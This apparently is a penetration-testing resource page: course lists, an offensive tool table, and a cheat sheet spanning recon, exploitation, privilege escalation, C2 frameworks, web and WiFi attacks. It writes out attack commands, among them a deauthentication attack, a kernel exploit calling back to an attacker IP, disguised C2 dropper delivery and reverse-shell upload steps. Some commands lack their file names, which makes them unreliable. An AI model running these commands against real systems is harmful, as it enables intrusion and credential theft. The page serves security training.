CARTP | Certified Azure Red Teaming Professional | Attacking & Defending Azure Cloud: Beginner’s Edition (CARTP)
Root me | Welcome [Root Me : Hacking and Information Security learning platform]
PentesterLab | PentesterLab: Learn Web Penetration Testing: The Right Way | Platform
CRTS | Red Team Specialist [CRTS] – CWL : Advanced Cyber Attack & Detection Learning Platform
VX-Underground | collection
Maldev Academy | Maldev Academy | Certification
Zero-Point Security | Red Team Ops II, Red Team Ops I, C2 Development C#… | Zero-Point Security
Fucking the book of secret knowledge | Correia-jpv/fucking-the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. With repository stars⭐ and forks🍴 | collection
Red Team Labs | Online Red Team Labs | Altered Security | Certification
HTB CPTS | HTB Penetration Testing Certification [CPTS] | Hack The Box | Certification
Game Of Thrones Active Directory | Self-hosted vulnerable AD lab. | Orange-Cyberdefense/GOAD: game of active directory
Pentesteracademy | All Courses – Full Listing
Breadev Academy | EvilNginx (Phishing course)
Rhino Security Labs | RhinoSecurityLabs/cloudgoat: CloudGoat is Rhino Security Labs’ “Vulnerable by Design” AWS deployment tool
Awesome EDR Bypass | List of PoC, blogs, tools etc | tkmru/awesome-edr-bypass: Awesome EDR Bypass Resources For Ethical Hacking
Awesome AV-EDR-XDR Bypass | How to bypass different AV vendors | MrEmpy/Awesome-AV-EDR-XDR-Bypass: Awesome AV/EDR/XDR Bypass Tips
Binary Offensive | Mgeeky. Initial Access Training | binary-offensive | Offensive IT Security | Courses
Sektor7 | Malware dev, windows evasion etc | SEKTOR7 Research | Course
Hacktricks Learning and Certs | Cloud Certs | HackTricks Training | Course/Certification
BallisKit | Initial Access Training and tool | BallisKit | Course/knowledge
Attacking and Defending Azure AD Cloud: Beginner’s Edition | Cloud Cert | Attacking & Defending Azure Cloud: Beginner’s Edition (CARTP)
The Art Of Initial Access | This course is for learning to create macros in VBA to gain initial access | MacroPioneer: The Art of Initial Access – Advanced Macro Techniques Series

Unsorted tools

Name of the Tool | Link | Description | Command Example | Tool Category
JAWS – Just Another Windows (Enum) Script | GitHub Link | JAWS is a Windows enumeration script. | N/A | Enumeration/Info Gathering
ProxyNotShell-PoC | GitHub Link | ProxyNotShell-PoC is a proof of concept tool. | N/A | Exploitation
MSSQL Practical Injection Cheat Sheet – Perspective Risk | Link | A practical cheat sheet for MSSQL injection. | N/A | Web Application
Pycrypt (Pycrypt) | GitHub Link | Pycrypt is a tool related to cryptography in Python. | N/A | Encryption/Decryption
Cython: C-Extensions for Python | Link | Cython is a tool for creating C-extensions for Python. | N/A | Development Tools
ZoomEye | Link | ZoomEye is a cyberspace mapping tool. | N/A | Enumeration/Info Gathering
ICMP Reverse Shell written in Python 3 (icmpdoor) | GitHub Link | icmpdoor is an ICMP reverse shell written in Python 3. | N/A | Post-Exploitation
ICMP reverse shell in Python 3 (Cryptsus Blog) | Link | Information on using an ICMP reverse shell in Python 3. | N/A | Post-Exploitation
You got Domain Admin, now what? | Link | An article discussing actions to take after gaining Domain Admin access. | N/A | Post-Exploitation
How to bypass sudo — exploit cve-2023–22809 vulnerability | Link | A guide on bypassing sudo using a CVE-2023-22809 vulnerability. | N/A | Privilege Escalation
fireprox: AWS API Gateway management tool | GitHub Link | fireprox is a tool for creating HTTP pass-through proxies for IP rotation using AWS API Gateway. | N/A | Web Application
OfflineSAM/OfflineAddAdmin2 | GitHub Link | OfflineSAM/OfflineAddAdmin2 is a tool for adding admin accounts offline in Windows. | N/A | Privilege Escalation
Falcon Sandbox | Link | Falcon Sandbox is a malware analysis service. | N/A | Malware Analysis
Inveigh: .NET IPv4/IPv6 machine-in-the-middle tool | GitHub Link | Inveigh is a tool for intercepting traffic and performing man-in-the-middle attacks on IPv4/IPv6 networks. | N/A | Exploitation
Pentesting CI/CD Methodology | Link | A methodology for penetration testing in CI/CD environments. | N/A | Penetration Testing
Sn1per: Attack Surface Management Platform | GitHub Link | Sn1per is an attack surface management platform. | N/A | Penetration Testing
SignatureGate: Weaponized HellsGate/SigFlip | GitHub Link | SignatureGate is a tool related to weaponized HellsGate/SigFlip. | N/A | Exploitation
Synergy-httpx: Python HTTP server for red teaming activities | GitHub Link | Synergy-httpx is a Python HTTP server designed for red teaming activities. | N/A | Web Application
RosFuscator: C# source code obfuscation project | GitHub Link | RosFuscator is a project for obfuscating C# source code using Roslyn. | N/A | Exploitation
Havoc | N/A | No link or description provided. | N/A | N/A
atomic-red-team: Detection tests based on MITRE’s ATT&CK | GitHub Link | atomic-red-team provides detection tests based on MITRE’s ATT&CK framework. | N/A | Enumeration/Info Gathering
ChainBrain AI: Advanced Prompts for ChatGPT | Link | ChainBrain AI is a tool for providing advanced prompts to ChatGPT. | N/A | N/A
Villain: C2 framework for reverse shells | GitHub Link | Villain is a C2 framework for handling multiple TCP socket and HoaxShell-based reverse shells. | N/A | Exploitation
Wormhole: Private file sharing | Link | Wormhole is a private file sharing tool. | N/A | N/A
PowershellKerberos: dumper.ps1 | GitHub Link | PowershellKerberos provides a dumper.ps1 script. | N/A | Enumeration/Info Gathering
pyFUD: Cross-platform remote access Trojan (RAT) | GitHub Link | pyFUD is a cross-platform remote access Trojan (RAT). | N/A | Malware
Caido: Lightweight web security auditing toolkit | N/A | No link provided. | N/A | N/A
OSINT Industries | Link | OSINT Industries provides OSINT tools and resources. | N/A | Enumeration/Info Gathering
IPVoid: IP address and network tools | Link | IPVoid offers IP address and network tools. | N/A | Enumeration/Info Gathering
LOTS Project: Living Off Trusted Sites | N/A | No link or description provided. | N/A | N/A
Penetration-Testing-Tools: Collection of tools and scripts | GitHub Link | A collection of tools, scripts, and cheatsheets for red teaming, penetration testing, and IT security audits. | N/A | Penetration Testing
XSStrike: Advanced XSS scanner | GitHub Link | XSStrike is an advanced XSS scanner. | N/A | Web Application
PetitPotam: PoC tool for Windows authentication | GitHub Link | PetitPotam is a proof of concept tool to coerce Windows hosts to authenticate to other machines. | N/A | Exploitation
Snaffler: Tool for finding candy | GitHub Link | Snaffler is a tool for pentesters to find valuable information. | N/A | Enumeration/Info Gathering
LaZagne: Credentials recovery project | GitHub Link | LaZagne is a credentials recovery project. | N/A | Password Cracking
rdpwrap: RDP Wrapper Library | GitHub Link | rdpwrap is an RDP Wrapper Library. | N/A | Privilege Escalation
iKAT: Interactive Kiosk Attack Tool | Link | iKAT is an interactive kiosk attack tool. | N/A | Exploitation
RdpThief: Extracting Clear Text Passwords from mstsc.exe | GitHub Link | RdpThief extracts clear text passwords from mstsc.exe using API hooking. | N/A | Password Cracking
Snusbase: Database Search Engine | Link | Snusbase is a database search engine. | N/A | Enumeration/Info Gathering
attacking-cloudgoat2: Walkthrough of CloudGoat 2.0 scenarios | GitHub Link | A step-by-step walkthrough of CloudGoat 2.0 scenarios. | N/A | Penetration Testing
ligolo-ng: Tunneling and pivoting tool | GitHub Link | ligolo-ng is a tunneling and pivoting tool that uses a TUN interface. | N/A | Exploitation
PowerAL: PowerShell module for identifying AppLocker weaknesses | GitHub Link | PowerAL is a PowerShell module for identifying AppLocker weaknesses. | N/A | Privilege Escalation
prettyRECON | N/A | No link or description provided. | N/A | N/A
ExtractBitlockerKeys: Script to extract Bitlocker recovery keys | GitHub Link | A script to automatically extract Bitlocker recovery keys from a domain. | N/A | Post-Exploitation
Microsoft-Activation-Scripts: Windows and Office activator | GitHub Link | A Windows and Office activator using HWID / KMS38 / Online KMS activation methods, with a focus on open-source code and fewer antivirus detections. | N/A | Exploitation
NetExec: The Network Execution Tool | GitHub Link | NetExec is a network execution tool. | N/A | Exploitation
naabu: Fast port scanner for attack surface discovery | GitHub Link | naabu is a fast port scanner designed for attack surface discovery in bug bounties and pentests. | N/A | Enumeration/Info Gathering
DavRelayUp: Local privilege escalation tool | GitHub Link | DavRelayUp is a tool for local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced. | N/A | Privilege Escalation
AD_Miner: Active Directory audit tool | GitHub Link | AD_Miner is an Active Directory audit tool that leverages Cypher queries to analyze data from the Bloodhound graph database and uncover security weaknesses. | N/A | Enumeration/Info Gathering
Perfusion: Exploit for RpcEptMapper registry key vulnerability | GitHub Link | Perfusion is an exploit for the RpcEptMapper registry key permissions vulnerability in Windows. | N/A | Exploitation
MSSqlPwner: Microsoft SQL Server exploitation tool | GitHub Link | MSSqlPwner is a tool for exploiting Microsoft SQL Server. | N/A | Exploitation
HeidiSQL: Database management tool | Link | HeidiSQL is a database management tool for MariaDB, MySQL, MSSQL, PostgreSQL, and SQLite. | N/A | Database Management
Apollo 11 Guidance Computer (AGC) Source Code | GitHub Link | Original source code for the Apollo 11 Guidance Computer (AGC) used in the command and lunar modules. | N/A | Software Development
| Link | A website providing links to various files and resources. | N/A | Enumeration/Info Gathering
Top Pentest Devices | N/A | No link or description provided. | N/A | N/A
WolframAlpha: Computational Intelligence | Link | WolframAlpha is a computational intelligence engine that provides answers to a wide range of queries.
tomcatWarDeployer: Apache Tomcat auto WAR deployment tool | GitHub Link | tomcatWarDeployer is a tool for automatically deploying WAR files to Apache Tomcat servers during penetration testing. | N/A | Exploitation
nmapAutomator: Background script for Nmap | GitHub Link | nmapAutomator is a script designed to run Nmap in the background and automate the process of port scanning and service enumeration. | N/A | Enumeration/Info Gathering
kerbrute: Kerberos bruteforcing script | GitHub Link | kerbrute is a script for performing Kerberos bruteforcing using Impacket library. | N/A | Password Cracking
kerbrute: Tool for Kerberos pre-auth bruteforcing | GitHub Link | kerbrute is a tool for performing Kerberos pre-authentication bruteforcing. | N/A | Password Cracking
attacktive-directory-tools: Tools for Active Directory | GitHub Link | attacktive-directory-tools is a collection of tools for Active Directory attacks and enumeration. | N/A | Enumeration/Info Gathering
pywerview: Python rewriting of PowerView | GitHub Link | pywerview is a Python rewrite of PowerSploit’s PowerView, a tool for Active Directory enumeration. | N/A | Enumeration/Info Gathering
evil-winrm: WinRM shell for hacking/pentesting | GitHub Link | evil-winrm is a tool for interacting with Windows Remote Management (WinRM) for hacking and penetration testing. | N/A | Exploitation
sqlmap: SQL injection and database takeover tool | GitHub Link | sqlmap is an automated SQL injection and database takeover tool. | N/A | Web Application
crunch: Wordlist generator | GitHub Link | crunch is a wordlist generator that allows you to specify a standard character set for generating password lists. | N/A | Password Cracking
wfuzz: Web application fuzzer | GitHub Link | wfuzz is a web application fuzzer that helps in discovering vulnerabilities through automated testing. | N/A | Web Application
OWASP CheatSheetSeries: Application security cheat sheets | GitHub Link | The OWASP Cheat Sheet Series provides a collection of high-value information on specific application security topics. | N/A | Security Reference
ncsc-scanning-made-easy-script-developer-guidelines.md | GitHub Link | Developer guidelines for creating scanning scripts as part of the UK NCSC Scanning Made Easy project. | N/A | Security Guidelines
pspy: Linux process monitoring without root permissions | GitHub Link | pspy is a tool for monitoring Linux processes without requiring root permissions. | N/A | Enumeration/Info Gathering
Churrasco: Changes for Visual Studio 2013 | GitHub Link | Churrasco contains changes for Visual Studio 2013. | N/A | Development Tools
MS10-059: Chimichurri Windows kernel exploit | GitHub Link | MS10-059 is a Windows kernel exploit known as Chimichurri. | N/A | Exploitation
CVE-2021-4034: 1-day vulnerability | GitHub Link | CVE-2021-4034 is a one-day vulnerability. | N/A | Exploitation
unicorn: PowerShell downgrade attack and shellcode injector | GitHub Link | unicorn is a tool for using a PowerShell downgrade attack and injecting shellcode into memory. | N/A | Exploitation
dostackbufferoverflowgood | GitHub Link | dostackbufferoverflowgood is a resource for learning about stack buffer overflows. | N/A | Exploitation
Obfuscated String/Shellcode Generator – Online Tool | Website Link | An online tool for generating obfuscated strings and shellcode. | N/A | Exploitation
explodingcan: Implementation of NSA’s ExplodingCan exploit | GitHub Link | explodingcan is an implementation of NSA’s ExplodingCan exploit in Python. | N/A | Exploitation
winPEAS: Privilege Escalation for Windows | GitHub Link | winPEAS is a

Information Gathering/ Enumeration

NMAP – Network Mapper NSEDoc Reference Portal

Nmap Cheat Sheet

Usage and Examples | Nmap Network Scanning

Firewall/IDS Evasion and Spoofing | Nmap Network Scanning
Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.
nmap -sC -sV -p- --min-rate 10000 <target-ip> -oN output
Batea: the goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports.
# Complete info
$ sudo nmap -A -oX output.xml

# Partial info
$ sudo nmap -O -sV -oX output.xml

$ batea -v output.xml
Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
# Extract any file that it finds
binwalk -e firmware.bin
Create phishing websites to phish information.
Censys reduces your Internet attack surface by continually discovering unknown assets and helping remediate Internet facing risks.
Shodan Engine for the Internet of Everything
apache country:no port:80 http.status:200
Dig (Domain Information Groper) is a command line utility that performs DNS lookup by querying name servers and displaying the result to you.
dig [server] [name] [type]
DNSdumpster is a FREE domain research tool that can discover hosts related to a domain. Search for domain.
Enum4Linux is a tool for enumerating information from Windows and Samba systems.
enum4linux -a host
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if known.
./EyeWitness -f urls.txt --web
Insomnia: API queries with GUI. See website.
Masscan is an Internet-scale port scanner. It can scan the entire Internet in under 5 minutes, transmitting 10 million packets per second, from a single machine.
Scans the entire Internet:
masscan -p0-65535
Maltego is a very powerful data mining tool that offers an endless combination of search tools and strategies.
SIPvicious suite OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password. See github for full documentation.
Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files.
$ steghide embed -cf picture.jpg -ef secret.txt
Enter passphrase:
Re-Enter passphrase:
embedding "secret.txt" in "picture.jpg"... done
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. See github.
theHarvester tool gathers names, emails, IPs, subdomains, and URLs.
theharvester -d -b googlex
Social searcher: Social Media Search Engine. n/a
Sn1per: hidden assets and vulnerabilities in your environment. See github.
gitleaks (GitHub – gitleaks/gitleaks: Protect and discover secrets using Gitleaks 🔑): Gitleaks is a SAST tool for detecting and preventing hardcoded secrets like passwords, api keys, and tokens in git repos.
gitleaks detect --source . -v
AutoRecon (GitHub – Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.): Automatic enumeration.
autorecon -t target


Repository for EternalBlue exploit. See repository.
Infection Monkey is a free, open-source network penetration testing tool. It is a breach and attack simulator that uses real-world attack techniques and known vulnerabilities.
Metasploit vulnerabilities automatically.
msfconsole
Windows-php-reverse-shell: PHP reverse shell implemented using binary, based on a webshell. Usage: change the IP and port in the windows-php-reverse-shell.php file, upload, set up a listener on your machine, access the windows-php-reverse-shell.php file on the server.
SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. To get a list of basic options and switches use:
python -h
IIS 6.0 BOF – RCE – Buffer Overflow in the ScStoragePathFromUrl function in WebDAV.
python2 targetip targetport srcip srcport
Drupalgeddon2 core – Highly critical – Remote Code Execution – SA-CORE-2018-002
ruby drupalgeddon2.rb TARGET
Windows Kernel Exploit: List of Kernel exploits. See github.

Password Crackers

Hashcat is a password cracking tool. See CheatSheet
Hydra tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. See CheatSheet

Privilege Escalation

Tool | Link | OS | Description | Command/Example
BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.
usage: beRoot.exe [-h] [-l]

Deepce: Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
# Make the script executable and then run it
chmod +x ./

GTFObins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. See website.
LinEnum: possible PrivEsc vectors. See github.
linPEAS: possible privesc vectors.
./
winPEAS: possible privesc vectors.
winpeas.exe or winpeas.bat
linuxprivchecker: possible privesc vectors.
linux-exploit-suggester: possible privesc vectors. Run locally.
./
windows-exploit-suggester: list possible privesc vectors. Run locally.
./ --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
PowerSploit\PowerUp.ps1 aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. See full potential in github. To execute on target, see my cheatsheet.
PowerSploit\PowerView.ps1 is a series of functions that perform network and Windows domain enumeration and exploitation. See full potential in github. To execute on target, see my cheatsheet.
Juicy Potato and its variants leverage the privilege escalation chain based on BITS service having the MiTM listener on and when you have SeImpersonate or SeAssignPrimaryToken privileges.
MS10-059 Chimichurri in the Tracing Feature for Services Could Allow an Elevation of Privilege (982799)
chimichurri.exe attackerip attackerport
Polkit CVE-2021-4034’s pkexec, a SUID-root program that is installed by default on every major Linux distribution:
python3 (run it on target to get root)


C2 – Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
C2 – PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. See github.
C2 – Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network.
C2 – Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
C2 – Starkiller (Empire frontend) is a Frontend for Powershell Empire.
./starkiller-<version>.AppImage --no-sandbox
C2 – Meterpreter PS1 starts a listener server on a Windows|Linux attacker machine and generates one-liner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machine.
Deliver Dropper/Payload To Target Machine (apache2)
USE THE 'Attack Vector URL' TO DELIVER '' (dropper) TO TARGET .. UNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..
C2 – Alan Framework is a post-exploitation framework useful during red-team activities.
C2 – Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing.
Linux One Liner
curl|sudo bash 
and then run 

Armitage is a Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
$ chisel server --port $PORT --proxy
# listens on $PORT, proxy web requests to
sshuttle allows you to create a VPN connection from your machine to any remote server that you can connect to via ssh.
sshuttle [options] -r [username@]sshserver[:port] <subnets …>
ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS). See github.
C2 – Havoc

GitHub – HavocFramework/Havoc: The Havoc Framework.
Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

New C2 framework that can bypass Win 11 defender
See github
C2 – Brute Ratel: Brute Ratel C4 | Badger doesn’t care. It takes what it wants! A Customized Command and Control Center for Red Team and Adversary Simulation

Web Application

Burp Suite is a framework of web application pentesting tools. It is used to perform web app testing.
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects.
dirb <url_base> [<wordlist_file(s)>] [options]
Dirbpy is a new version of dirb but in python. This version is faster than the normal version in C because it uses threads. Dirbpy is a Web Content Scanner. It looks for hidden Web Objects.
dirbpy -o -u https://[....].com
Dirhunter is a web crawler optimized for searching and analyzing directories.
$ dirhunt
ffuf: fast web fuzzer written in Go.
ffuf -w /path/to/wordlist -u https://target/FUZZ
Feroxbuster is a tool designed to perform Forced Browsing.
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
Gobuster is a tool used to brute-force:
URIs (directories and files) in web sites.
DNS subdomains (with wildcard support).
Virtual Host names on target web servers.
Open Amazon S3 buckets
gobuster dir -u http:// -w wordlist
Fuxploider tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.
python3 --url --not-regex "wrong file type"
FuzzDB the likelihood of finding application security vulnerabilities through dynamic application security testing.
Nikto is a web server scanner.
nikto -h <target>
Raccoon: Security Tool for Reconnaissance and Information Gathering.
Usage: raccoon [OPTIONS] TARGET
Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT.To enumerate subdomains of specific domain:
python -d
Joomscan the task of vulnerability detection and reliability assurance in Joomla CMS [options]
Droopscan CMS are:
droopescan scan drupal -u -t 32
Crawleet: Recon & Exploitation Tool.
python -u <URL>
wafw00f Bypass
wafw00f http://target

Active Directory Environment

BloodHoundAD uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment.
Impacket is a collection of Python classes for working with network protocols. NOT LIMITED TO AD ENVIRONMENT.
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. NOT LIMITED TO AD ENVIRONMENT. See github.
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. NOT LIMITED TO AD ENVIRONMENT. See github.

Malware Analysis(MA)/ Buffer Overflow(BOF)

MA: Ghidra, a software reverse engineering (SRE) suite of tools developed by NSA’s Research Directorate in support of the Cybersecurity mission.
BOF: Python GDB PEDA – Python Exploit Development Assistance for GDB. See Github.

WiFi / Wireless

Aircrack-ng is a complete suite of tools to assess WiFi network security.

Monitoring: Packet capture and export of data to text files for further processing by third party tools
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)
# Deauth attack
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

# Start airodump-ng to collect authentication handshake
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
BoopSuite is a set of tools written in Python designed for wireless auditing and security testing.
BoopMon [-h] [-v] [-c [CHANNEL [CHANNEL ...]]] [-k] [-n NAME] -i {} [-m MAC]
Kismet is a wireless network and device detector, sniffer, wardriving tool, and WIDS (wireless intrusion detection) framework.